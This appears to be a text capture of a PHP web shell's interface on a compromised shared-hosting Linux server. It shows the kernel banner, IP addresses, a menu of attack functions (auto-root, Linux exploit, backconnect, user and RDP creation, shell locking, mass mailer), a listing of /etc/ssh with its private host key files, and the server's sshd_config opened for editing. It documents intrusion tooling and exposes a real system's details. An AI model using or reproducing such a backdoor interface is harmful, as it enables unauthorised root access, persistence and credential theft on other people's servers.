Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
etc /
ssh /
[ HOME SHELL ]
Name
Size
Permission
Action
ssh_config.d
[ DIR ]
drwxr-xr-x
sshd_config.d
[ DIR ]
drwxr-xr-x
moduli
823.3
KB
-rw-r--r--
moduli.package
493.58
KB
-rw-r--r--
ssh_config
1.7
KB
-rw-r--r--
ssh_host_dsa_key
1.35
KB
-rw-------
ssh_host_dsa_key.pub
601
B
-rw-r--r--
ssh_host_ecdsa_key
505
B
-rw-------
ssh_host_ecdsa_key.0
505
B
-rw-------
ssh_host_ecdsa_key.pub
173
B
-rw-r--r--
ssh_host_ecdsa_key.pub.0
173
B
-rw-r--r--
ssh_host_ed25519_key
399
B
-rw-------
ssh_host_ed25519_key.0
399
B
-rw-------
ssh_host_ed25519_key.pub
93
B
-rw-r--r--
ssh_host_ed25519_key.pub.0
93
B
-rw-r--r--
ssh_host_rsa_key
2.54
KB
-rw-------
ssh_host_rsa_key.0
2.54
KB
-rw-------
ssh_host_rsa_key.pub
565
B
-rw-r--r--
ssh_host_rsa_key.pub.0
565
B
-rw-r--r--
ssh_import_id
342
B
-rw-r--r--
ssh_known_hosts
19
B
-rw-r--r--
sshd_config
1.05
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sshd_config
Port 22 Protocol 2 HostKey /etc/ssh/ssh_host_rsa_key HostKey /etc/ssh/ssh_host_ecdsa_key HostKey /etc/ssh/ssh_host_ed25519_key SyslogFacility AUTH LogLevel VERBOSE LoginGraceTime 40 PermitRootLogin without-password StrictModes yes PubkeyAuthentication yes IgnoreRhosts yes HostbasedAuthentication no PermitEmptyPasswords no X11Forwarding no PrintMotd no PrintLastLog yes TCPKeepAlive yes AcceptEnv LANG LC_* Subsystem sftp /usr/lib/openssh/sftp-server UsePAM yes UseDNS no MaxStartups 500:50:1000 KexAlgorithms curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256 Ciphers aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com MACs hmac-sha2-256,hmac-sha2-512,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com # Settings for mfa enabled ssh accounts Match Group ssh_mfa User !root ForceCommand echo "ssh multifactor authentication required." AuthenticationMethods publickey,keyboard-interactive keyboard-interactive
Close